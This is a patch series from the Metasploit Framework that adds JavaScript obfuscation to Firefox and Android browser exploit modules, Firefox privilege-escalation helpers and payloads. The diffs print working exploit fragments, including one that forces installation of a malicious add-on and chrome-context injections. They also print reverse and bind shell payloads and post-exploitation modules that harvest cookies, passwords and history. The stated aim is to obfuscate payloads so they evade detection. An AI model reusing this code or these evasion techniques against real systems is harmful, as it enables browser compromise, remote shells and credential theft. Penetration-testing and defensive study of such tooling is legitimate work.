From d9e6f2896f05e16718d61c8190a75a70eb5f9fff Mon Sep 17 00:00:00 2001
From: Joe Vennix <joe_vennix@rapid7.com>
Date: Sun, 21 Sep 2014 23:45:59 -0500
Subject: [PATCH 1/5] Add the JSObfu mixin to a lot of places.

---
 lib/msf/core/exploit/android.rb               |  8 ++--
 .../remote/firefox_privilege_escalation.rb    |  9 ++++-
 .../browser/firefox_proto_crmfrequest.rb      | 38 +++++++++++-------
 .../multi/browser/firefox_svg_plugin.rb       | 40 ++++++++++---------
 .../firefox_tostring_console_injection.rb     |  6 +--
 .../multi/browser/firefox_webidl_injection.rb |  7 +---
 spec/lib/msf/core/exploit/android_spec.rb     |  8 ++++
 .../remote/browser_exploit_server_spec.rb     |  3 +-
 .../firefox_privilege_escalation_spec.rb      |  8 ++++
 .../examples/msf/core/exploit/jsobfu.rb}      |  5 ++-
 10 files changed, 82 insertions(+), 50 deletions(-)
 create mode 100644 spec/lib/msf/core/exploit/android_spec.rb
 create mode 100644 spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb
 rename spec/{lib/msf/core/exploit/jsobfu_spec.rb => support/shared/examples/msf/core/exploit/jsobfu.rb} (95%)

diff --git a/lib/msf/core/exploit/android.rb b/lib/msf/core/exploit/android.rb
index 8f2bd4f76d..e038a151fa 100644
--- a/lib/msf/core/exploit/android.rb
+++ b/lib/msf/core/exploit/android.rb
@@ -1,9 +1,12 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 module Msf
 module Exploit::Android
 
+  include Msf::Exploit::JSObfu
+
   # Since the NDK stager is used, arch detection must be performed
   SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]
 
@@ -20,7 +23,7 @@ module Exploit::Android
 
   def add_javascript_interface_exploit_js(arch)
     stagename = Rex::Text.rand_text_alpha(5)
-    script = %Q|
+    js_obfuscate %Q|
       function exec(runtime, cmdArr) {
         var ch = 0;
         var output = '';
@@ -84,9 +87,6 @@ module Exploit::Android
 
       for (i in top) { if (attemptExploit(top[i]) === true) break; }
     |
-
-    # remove comments and empty lines
-    script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
   end
 
 
diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
index a927911220..2ce211a679 100644
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@@ -7,16 +7,23 @@
 #
 ###
 
+require 'msf/core/exploit/jsobfu'
+
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
 
+  include Msf::Exploit::JSObfu
+
   # Sends the +js+ code to the remote session, which executes it in Firefox's
-  # privileged javascript context
+  # privileged javascript context. The code will be obfuscated if the JsObfuscate
+  # datastore option is set to 1 or higher.
+  #
   # @return [String] the results that were sent back. This can be achieved through
   #   calling the "send" function, or by just returning the value in +js+
   def js_exec(js, timeout=30)
     print_status "Running the privileged javascript..."
     token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
+    js = js_obfuscate(js)
     session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
     session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
   end
diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
index 2b24b83cc1..8d2f5c3f09 100644
--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@@ -79,21 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
       "p2.constructor.defineProperty(obj,key,{get:runme});"
     end
 
-    %Q|
-      <html>
-      <body>
-      #{datastore['CONTENT']}
-      <div id='payload' style='display:none'>
-      if (!window.done) {
-        window.AddonManager.getInstallForURL(
-          '#{get_module_uri}/addon.xpi',
-          function(install) { install.install() },
-          'application/x-xpinstall'
-        );
-        window.done = true;
-      }
-      </div>
-      <script>
+    script = js_obfuscate %Q|
       try{InstallTrigger.install(0)}catch(e){p=e;};
       var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
       p2.__exposedProps__={
@@ -116,6 +102,28 @@ class Metasploit3 < Msf::Exploit::Remote
       };
       for (var i in window) register(window, i);
       for (var i in document) register(document, i);
+    |
+
+    js_payload = js_obfuscate %Q|
+      if (!window.done) {
+        window.AddonManager.getInstallForURL(
+          '#{get_module_uri}/addon.xpi',
+          function(install) { install.install() },
+          'application/x-xpinstall'
+        );
+        window.done = true;
+      }
+    |
+
+    %Q|
+      <html>
+      <body>
+      #{datastore['CONTENT']}
+      <div id='payload' style='display:none'>
+        #{js_payload}
+      </div>
+      <script>
+        #{script}
       </script>
       </body>
       </html>
diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb
index 1adc54b483..fa85166464 100644
--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -129,24 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
       :loader_path      => "#{get_module_uri}.swf",
       :content          => self.datastore['CONTENT'] || ''
     }
-    %Q|
-      <!doctype html>
-      <html>
-      <head>
-        <base href="chrome://browser/content/">
-      </head>
-      <body>
-
-      <svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
-        <symbol id="#{vars[:symbol_id]}">
-          <foreignObject>
-            <object></object>
-          </foreignObject>
-        </symbol>
-        <use />
-      </svg>
-
-      <script>
+    script = js_obfuscate %Q|
       var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
       var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
       function $() {
@@ -169,6 +152,27 @@ class Metasploit3 < Msf::Exploit::Remote
       document.querySelector('use').setAttributeNS(
         "http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
       );
+    |
+
+    %Q|
+      <!doctype html>
+      <html>
+      <head>
+        <base href="chrome://browser/content/">
+      </head>
+      <body>
+
+      <svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
+        <symbol id="#{vars[:symbol_id]}">
+          <foreignObject>
+            <object></object>
+          </foreignObject>
+        </symbol>
+        <use />
+      </svg>
+
+      <script>
+      #{script}
       </script>
 
       <iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"
diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
index 78b0c0b6c9..250e0348b2 100644
--- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
+++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
     key = Rex::Text.rand_text_alpha(5 + rand(12))
     opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
 
-    js = Rex::Exploitation::JSObfu.new(%Q|
+    js = js_obfuscate %Q|
       var opts = #{JSON.unparse(opts)};
       var key = opts['#{key}'];
       var y = {}, q = false;
@@ -85,9 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
         return 5;
       };
       console.time(y);
-    |)
-
-    js.obfuscate
+    |
 
     %Q|
       <!doctype html>
diff --git a/modules/exploits/multi/browser/firefox_webidl_injection.rb b/modules/exploits/multi/browser/firefox_webidl_injection.rb
index 135eeb6e76..0732666d7c 100644
--- a/modules/exploits/multi/browser/firefox_webidl_injection.rb
+++ b/modules/exploits/multi/browser/firefox_webidl_injection.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
                "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
                "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
 
-    js = Rex::Exploitation::JSObfu.new(%Q|
+    js = js_obfuscate %Q|
       var opts = #{JSON.unparse(opts)};
       var key = opts['#{key}'];
 
@@ -127,10 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
           setTimeout(function(){top.vvv.close();}, 100);
         }, 10);
       }
-
-    |)
-
-    js.obfuscate
+    |
 
     %Q|
       <!doctype html>
diff --git a/spec/lib/msf/core/exploit/android_spec.rb b/spec/lib/msf/core/exploit/android_spec.rb
new file mode 100644
index 0000000000..5e0d19c3b6
--- /dev/null
+++ b/spec/lib/msf/core/exploit/android_spec.rb
@@ -0,0 +1,8 @@
+require 'spec_helper'
+require 'msf/core'
+
+describe Msf::Exploit::Android do
+
+  it_should_behave_like 'Msf::Exploit::JSObfu'
+
+end
diff --git a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
index 62c27f770d..7aa70b3209 100644
--- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
@@ -1,6 +1,5 @@
 require 'spec_helper'
 require 'msf/core'
-require 'msf/core/exploit/remote/browser_exploit_server'
 
 describe Msf::Exploit::Remote::BrowserExploitServer do
 
@@ -58,6 +57,8 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     server.start_service
   end
 
+  it_should_behave_like 'Msf::Exploit::JSObfu'
+
   describe "#get_module_resource" do
     it "should give me a URI to access the exploit page" do
       module_resource = server.get_module_resource
diff --git a/spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb b/spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb
new file mode 100644
index 0000000000..3eca2d57b2
--- /dev/null
+++ b/spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb
@@ -0,0 +1,8 @@
+require 'spec_helper'
+require 'msf/core'
+
+describe Msf::Exploit::Remote::FirefoxPrivilegeEscalation do
+
+  it_should_behave_like 'Msf::Exploit::JSObfu'
+
+end
\ No newline at end of file
diff --git a/spec/lib/msf/core/exploit/jsobfu_spec.rb b/spec/support/shared/examples/msf/core/exploit/jsobfu.rb
similarity index 95%
rename from spec/lib/msf/core/exploit/jsobfu_spec.rb
rename to spec/support/shared/examples/msf/core/exploit/jsobfu.rb
index 718770a25b..4270490670 100644
--- a/spec/lib/msf/core/exploit/jsobfu_spec.rb
+++ b/spec/support/shared/examples/msf/core/exploit/jsobfu.rb
@@ -3,11 +3,11 @@ require 'msf/core'
 require 'msf/core/exploit/jsobfu'
 
 
-describe Msf::Exploit::JSObfu do
+shared_examples_for 'Msf::Exploit::JSObfu' do
+
   subject(:jsobfu) do
     mod = ::Msf::Module.new
     mod.extend described_class
-    mod.send(:initialize, {})
     mod
   end
 
@@ -58,4 +58,5 @@ describe Msf::Exploit::JSObfu do
       expect(obj.to_s).to include(js)
     end
   end
+
 end
\ No newline at end of file

From ec88957ff4168067afdb28c3efabf32faef4c1a8 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joe_vennix@rapid7.com>
Date: Sun, 21 Sep 2014 23:57:58 -0500
Subject: [PATCH 2/5] Whitespace tweaks.

---
 .../core/exploit/remote/firefox_privilege_escalation_spec.rb    | 2 +-
 spec/support/shared/examples/msf/core/exploit/jsobfu.rb         | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb b/spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb
index 3eca2d57b2..392ee8e850 100644
--- a/spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/firefox_privilege_escalation_spec.rb
@@ -5,4 +5,4 @@ describe Msf::Exploit::Remote::FirefoxPrivilegeEscalation do
 
   it_should_behave_like 'Msf::Exploit::JSObfu'
 
-end
\ No newline at end of file
+end
diff --git a/spec/support/shared/examples/msf/core/exploit/jsobfu.rb b/spec/support/shared/examples/msf/core/exploit/jsobfu.rb
index 4270490670..8d3e7dae4a 100644
--- a/spec/support/shared/examples/msf/core/exploit/jsobfu.rb
+++ b/spec/support/shared/examples/msf/core/exploit/jsobfu.rb
@@ -59,4 +59,4 @@ shared_examples_for 'Msf::Exploit::JSObfu' do
     end
   end
 
-end
\ No newline at end of file
+end

From 5d234c0e014140c43e638b1a076f6ab8a9c0fd10 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joe_vennix@rapid7.com>
Date: Wed, 24 Sep 2014 15:07:14 -0500
Subject: [PATCH 3/5] Pass #send in this so jsobfu is not confused.

---
 lib/msf/core/payload/firefox.rb            | 14 ++++++++------
 modules/post/firefox/gather/cookies.rb     |  2 +-
 modules/post/firefox/gather/history.rb     |  2 +-
 modules/post/firefox/gather/passwords.rb   |  2 +-
 modules/post/firefox/gather/xss.rb         |  2 +-
 modules/post/firefox/manage/webcam_chat.rb |  2 +-
 6 files changed, 13 insertions(+), 11 deletions(-)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index f8b940708d..3703b391eb 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -121,12 +121,14 @@ module Msf::Payload::Firefox
           var retVal = null;
 
           try {
-            retVal = Function('send', js[1])(function(r){
-              if (sent) return;
-              sent = true;
-              if (r) {
-                if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
-                else      cb(false, r+tag+"\\n");
+            retVal = Function(js[1]).call({
+              send: function(r){
+                if (sent) return;
+                sent = true;
+                if (r) {
+                  if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
+                  else      cb(false, r+tag+"\\n");
+                }
               }
             });
           } catch (e) { retVal = e.message; }
diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb
index 18cefbef6f..0153b5c0ce 100644
--- a/modules/post/firefox/gather/cookies.rb
+++ b/modules/post/firefox/gather/cookies.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Post
         } catch (e) {
           send(e);
         }
-      })(send);
+      })(this.send);
     |.strip
   end
 end
diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb
index 1db4ed7993..12341780ce 100644
--- a/modules/post/firefox/gather/history.rb
+++ b/modules/post/firefox/gather/history.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Post
         } catch (e) {
           send(e);
         }
-      })(send);
+      })(this.send);
     |.strip
   end
 end
diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb
index 819ac3c81b..72e8dda5e8 100644
--- a/modules/post/firefox/gather/passwords.rb
+++ b/modules/post/firefox/gather/passwords.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Post
         } catch (e) {
           send(e);
         }
-      })(send);
+      })(this.send);
     |.strip
   end
 end
diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
index 63049a2a7b..99cdcf4e9b 100644
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Post
         };
 
         setTimeout(evt, 200);
-      })(send);
+      })(this.send);
 
     |.strip
   end
diff --git a/modules/post/firefox/manage/webcam_chat.rb b/modules/post/firefox/manage/webcam_chat.rb
index c6e5bd8a58..d0794cdd8d 100644
--- a/modules/post/firefox/manage/webcam_chat.rb
+++ b/modules/post/firefox/manage/webcam_chat.rb
@@ -105,7 +105,7 @@ class Metasploit3 < Msf::Post
         } catch (e) {
           send(e);
         }
-      })(send);
+      })(this.send);
     |
   end
 

From b96a7ed1d048d0089e738fdbabb041522347b398 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joe_vennix@rapid7.com>
Date: Wed, 24 Sep 2014 16:05:00 -0500
Subject: [PATCH 4/5] Install a global object in firefox payloads, bump jsobfu.

---
 Gemfile.lock                                  |  4 ++--
 .../remote/firefox_privilege_escalation.rb    |  1 +
 lib/msf/core/payload/firefox.rb               | 21 +++++++++++--------
 metasploit-framework.gemspec                  |  2 +-
 modules/payloads/singles/firefox/exec.rb      |  1 +
 .../singles/firefox/shell_bind_tcp.rb         |  1 +
 .../singles/firefox/shell_reverse_tcp.rb      |  2 ++
 7 files changed, 20 insertions(+), 12 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index ed2e935cf6..87772d454d 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.1.7)
+      jsobfu (~> 0.2.0)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.1.7)
+    jsobfu (0.2.0)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)
diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
index 2ce211a679..000327bbfc 100644
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@@ -12,6 +12,7 @@ require 'msf/core/exploit/jsobfu'
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
 
+  # automatically obfuscate anything that runs through `js_exec`
   include Msf::Exploit::JSObfu
 
   # Sends the +js+ code to the remote session, which executes it in Firefox's
diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 3703b391eb..2d116ca0d4 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -1,9 +1,13 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 require 'json'
 
 module Msf::Payload::Firefox
 
+  # automatically obfuscate every Firefox payload
+  include Msf::Exploit::JSObfu
+
   # Javascript source code of setTimeout(fn, delay)
   # @return [String] javascript source code that exposes the setTimeout(fn, delay) method
   def set_timeout_source
@@ -121,16 +125,15 @@ module Msf::Payload::Firefox
           var retVal = null;
 
           try {
-            retVal = Function(js[1]).call({
-              send: function(r){
-                if (sent) return;
-                sent = true;
-                if (r) {
-                  if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
-                  else      cb(false, r+tag+"\\n");
-                }
+            this.send = function(r){
+              if (sent) return;
+              sent = true;
+              if (r) {
+                if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
+                else      cb(false, r+tag+"\\n");
               }
-            });
+            };
+            retVal = Function(js[1]).call(this);
           } catch (e) { retVal = e.message; }
 
           sync = false;
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 3f1fd9b334..9217019719 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks
diff --git a/modules/payloads/singles/firefox/exec.rb b/modules/payloads/singles/firefox/exec.rb
index 7c9b7afc9b..0487ed87e2 100644
--- a/modules/payloads/singles/firefox/exec.rb
+++ b/modules/payloads/singles/firefox/exec.rb
@@ -34,6 +34,7 @@ module Metasploit3
     <<-EOS
 
       (function(){
+        window = this;
         #{read_file_source if datastore['WSCRIPT']}
         #{run_cmd_source if datastore['WSCRIPT']}
 
diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
index 377c25a624..115755b92e 100644
--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -34,6 +34,7 @@ module Metasploit3
   def generate
     %Q|
     (function(){
+      window = this;
       Components.utils.import("resource://gre/modules/NetUtil.jsm");
       var lport = #{datastore["LPORT"]};
       var rhost = "#{datastore['RHOST']}";
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index e3a8d572fe..22fc3a6327 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -32,6 +32,8 @@ module Metasploit3
     <<-EOS
 
       (function(){
+        window = this;
+
         Components.utils.import("resource://gre/modules/NetUtil.jsm");
         var host = '#{datastore["LHOST"]}';
         var port = #{datastore["LPORT"]};

From 2b02174999a8471ce2eb818b4d2ce9e64a091a2f Mon Sep 17 00:00:00 2001
From: Joe Vennix <joe_vennix@rapid7.com>
Date: Thu, 25 Sep 2014 16:00:37 -0500
Subject: [PATCH 5/5] Yank Android->jsobfu integration. Not really needed
 currently.

---
 lib/msf/core/exploit/android.rb                           | 5 +----
 .../android/browser/webview_addjavascriptinterface.rb     | 2 ++
 spec/lib/msf/core/exploit/android_spec.rb                 | 8 --------
 3 files changed, 3 insertions(+), 12 deletions(-)
 delete mode 100644 spec/lib/msf/core/exploit/android_spec.rb

diff --git a/lib/msf/core/exploit/android.rb b/lib/msf/core/exploit/android.rb
index e038a151fa..32fece6c49 100644
--- a/lib/msf/core/exploit/android.rb
+++ b/lib/msf/core/exploit/android.rb
@@ -1,12 +1,9 @@
 # -*- coding: binary -*-
 require 'msf/core'
-require 'msf/core/exploit/jsobfu'
 
 module Msf
 module Exploit::Android
 
-  include Msf::Exploit::JSObfu
-
   # Since the NDK stager is used, arch detection must be performed
   SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE, ARCH_X86 ]
 
@@ -23,7 +20,7 @@ module Exploit::Android
 
   def add_javascript_interface_exploit_js(arch)
     stagename = Rex::Text.rand_text_alpha(5)
-    js_obfuscate %Q|
+    %Q|
       function exec(runtime, cmdArr) {
         var ch = 0;
         var output = '';
diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
index 3fcbe9455f..c6571e90ce 100644
--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -74,6 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
         :os_flavor  => 'Android'
       }
     ))
+
+    deregister_options('JsObfuscate')
   end
 
   # Hooked to prevent BrowserExploitServer from attempting to do JS detection
diff --git a/spec/lib/msf/core/exploit/android_spec.rb b/spec/lib/msf/core/exploit/android_spec.rb
deleted file mode 100644
index 5e0d19c3b6..0000000000
--- a/spec/lib/msf/core/exploit/android_spec.rb
+++ /dev/null
@@ -1,8 +0,0 @@
-require 'spec_helper'
-require 'msf/core'
-
-describe Msf::Exploit::Android do
-
-  it_should_behave_like 'Msf::Exploit::JSObfu'
-
-end